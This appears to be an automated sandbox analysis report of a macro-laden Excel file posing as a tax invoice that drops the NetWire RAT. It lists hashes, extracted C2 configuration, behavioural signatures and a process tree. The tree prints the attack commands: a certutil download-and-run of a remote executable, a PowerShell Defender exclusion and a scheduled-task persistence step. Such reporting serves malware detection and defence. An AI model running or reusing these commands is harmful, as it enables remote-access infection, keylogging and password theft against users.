Analysis
-
max time kernel
136s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
-
submitted
10-08-2022 17:40
General
-
Target
TAX INVOICE 00893.xlsm
-
Size
42KB
-
MD5
dfd371ebf737c86675d54224482f3bf3
-
SHA1
e84195e5871bfef86c18563ebe7b6ad1077f81e5
-
SHA256
e209b1e1be73d201c0cf316df426fa1e0c2b436acf2d8c269ac6694b936d839e
-
SHA512
994ba3a222532826c82081eb92ecb6d5cd57faf162fbd5e84ec1679fa13def5813b48c0f0b40044adf92a72ea9c6778c66474690635a7d0597e0f7c43b4391f2
Malware Config
Extracted
netwire
194.5.98.126:3378
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
Pass@2023
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 3 IoCs
-
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TAX INVOICE 00893.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe && Aqrmdtmrohibrqzfihirniu.exe.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe3⤵
-
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exeAqrmdtmrohibrqzfihirniu.exe.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\TmbJbrgFWL.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmbJbrgFWL" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA558.tmp"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a64397f81fbb634e5722c149ed96e697
SHA10066ad87360f8dc6106b6f144b68b934496a8bcb
SHA256053324b6ec3340c4f5ebca656664c30cbba089d6f0316548c66ee7594b57a6d6
SHA51269ce73eee3f4588c965dd95687a10a35fae732fbbe359b3dd2edf3ebc2ac5b22aa5b04e9b45b9b9e7d505d3047626a968777d20fa89ee6f5030b411daeb9897f
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
-
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
672KB
-
-
Filesize
6.2MB
-
Filesize
104KB
-
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
6.5MB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
56KB
-
Filesize
104KB
-
Filesize
204KB
-
-
Filesize
204KB
-
Filesize
204KB
-